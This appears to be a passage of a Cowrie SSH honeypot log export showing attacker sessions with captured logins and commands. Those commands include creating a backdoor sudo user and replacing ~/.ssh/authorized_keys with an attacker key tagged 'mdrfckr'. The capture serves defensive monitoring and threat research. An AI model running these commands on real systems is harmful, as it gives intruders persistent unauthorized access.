m"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:26:57.497473Z"",""src_ip"":""198.235.24.158"",""session"":""79e745d1bcb3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:30:58.792 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""101.132.132.123"",""src_port"":57658,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""3373e9d34582"",""protocol"":""ssh"",""message"":""New connection: 101.132.132.123:57658 (10.0.0.4:2222) [session: 3373e9d34582]"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:30:58.791385Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:30:58.793 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.00036334991455078125,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:30:58.793026Z"",""src_ip"":""101.132.132.123"",""session"":""3373e9d34582""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:55:56.650 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""185.234.216.122"",""src_port"":64001,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""f60f6aa43434"",""protocol"":""ssh"",""message"":""New connection: 185.234.216.122:64001 (10.0.0.4:2222) [session: f60f6aa43434]"",""sensor"":""server01"",""timestamp"":""2024-09-20T09:55:56.649620Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:55:56.771 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.11994218826293945,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T09:55:56.770764Z"",""src_ip"":""185.234.216.122"",""session"":""f60f6aa43434""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:20.888 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":59156,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""60cf92be1cbd"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:59156 (10.0.0.4:2222) [session: 60cf92be1cbd]"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:20.887305Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:21.219 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:21.218168Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:21.221 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:21.219380Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:23.390 AM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:23.389426Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.171 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.169487Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.172 AM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 tJbudZAU) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 tJbudZAU) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.171748Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.173 AM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 tJbudZAU"",""message"":""CMD: openssl passwd -1 tJbudZAU"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.172878Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.175 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 tJbudZAU"",""message"":""Command not found: openssl passwd -1 tJbudZAU"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.174330Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.177 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.176619Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.179 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.178303Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.725 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/f6a7de03af800bb40a7eb0cb2526912817ae1570d78d4b4d6e11d565f4822ace"",""size"":725,""shasum"":""f6a7de03af800bb40a7eb0cb2526912817ae1570d78d4b4d6e11d565f4822ace"",""duplicate"":false,""duration"":0.5540509223937988,""message"":""Closing TTY Log: var/lib/cowrie/tty/f6a7de03af800bb40a7eb0cb2526912817ae1570d78d4b4d6e11d565f4822ace after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.723131Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:12:24.727 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.837700843811035,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:12:24.726382Z"",""src_ip"":""183.81.169.238"",""session"":""60cf92be1cbd""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:19.303 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""2.228.25.92"",""src_port"":57734,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""2ec949347d19"",""protocol"":""ssh"",""message"":""New connection: 2.228.25.92:57734 (10.0.0.4:2222) [session: 2ec949347d19]"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:19.302688Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:19.305 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh_0.9.6"",""message"":""Remote SSH version: SSH-2.0-libssh_0.9.6"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:19.304109Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:19.418 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""f555226df1963d1d3c09daf865abdc9a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group18-sha512"",""diffie-hellman-group16-sha512"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519"",""ecdsa-sha2-nistp521"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp256"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes256-gcm@openssh.com"",""aes128-gcm@openssh.com"",""aes256-ctr"",""aes192-ctr"",""aes128-ctr"",""aes256-cbc"",""aes192-cbc"",""aes128-cbc"",""3des-cbc""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:19.415931Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:19.946 AM",,"{""eventid"":""cowrie.login.success"",""username"":""user1"",""password"":""12345"",""message"":""login attempt [user1/12345] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:19.945537Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.260 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.259758Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.262 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cd ~; chattr -ia .ssh; lockr -ia .ssh"",""message"":""CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.261223Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.264 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""lockr -ia .ssh"",""message"":""Command not found: lockr -ia .ssh"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.264233Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.490 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644"",""size"":32,""shasum"":""c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644"",""duplicate"":false,""duration"":0.22824549674987793,""message"":""Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.487667Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.685 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.678473Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.686 AM",,"{""eventid"":""cowrie.command.input"",""input"":""cd ~ && rm -rf .ssh && mkdir .ssh && echo \""ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"",""message"":""CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \""ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.685521Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.803 AM",,"{""eventid"":""cowrie.session.file_download"",""duplicate"":false,""outfile"":""var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2"",""shasum"":""a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2"",""destfile"":""/home/user1/.ssh/authorized_keys"",""message"":""Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.801287Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.806 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f"",""size"":0,""shasum"":""cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f"",""duplicate"":false,""duration"":0.12624573707580566,""message"":""Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.804214Z"",""src_ip"":""2.228.25.92"",""session"":""2ec949347d19""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.906 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""2.228.25.92"",""src_port"":58364,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""0e045697c64f"",""protocol"":""ssh"",""message"":""New connection: 2.228.25.92:58364 (10.0.0.4:2222) [session: 0e045697c64f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.905730Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:20.908 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh_0.9.6"",""message"":""Remote SSH version: SSH-2.0-libssh_0.9.6"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:20.907319Z"",""src_ip"":""2.228.25.92"",""session"":""0e045697c64f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.017 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""f555226df1963d1d3c09daf865abdc9a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group18-sha512"",""diffie-hellman-group16-sha512"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519"",""ecdsa-sha2-nistp521"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp256"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes256-gcm@openssh.com"",""aes128-gcm@openssh.com"",""aes256-ctr"",""aes192-ctr"",""aes128-ctr"",""aes256-cbc"",""aes192-cbc"",""aes128-cbc"",""3des-cbc""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.015205Z"",""src_ip"":""2.228.25.92"",""session"":""0e045697c64f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.490 AM",,"{""eventid"":""cowrie.login.success"",""username"":""345gs5662d34"",""password"":""345gs5662d34"",""message"":""login attempt [345gs5662d34/345gs5662d34] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.489267Z"",""src_ip"":""2.228.25.92"",""session"":""0e045697c64f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.601 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.6935734748840332,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.600756Z"",""src_ip"":""2.228.25.92"",""session"":""0e045697c64f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.708 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""2.228.25.92"",""src_port"":58568,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1124547e066c"",""protocol"":""ssh"",""message"":""New connection: 2.228.25.92:58568 (10.0.0.4:2222) [session: 1124547e066c]"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.706878Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.709 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh_0.9.6"",""message"":""Remote SSH version: SSH-2.0-libssh_0.9.6"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:39:21.708498Z"",""src_ip"":""2.228.25.92"",""session"":""1124547e066c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:39:21.822 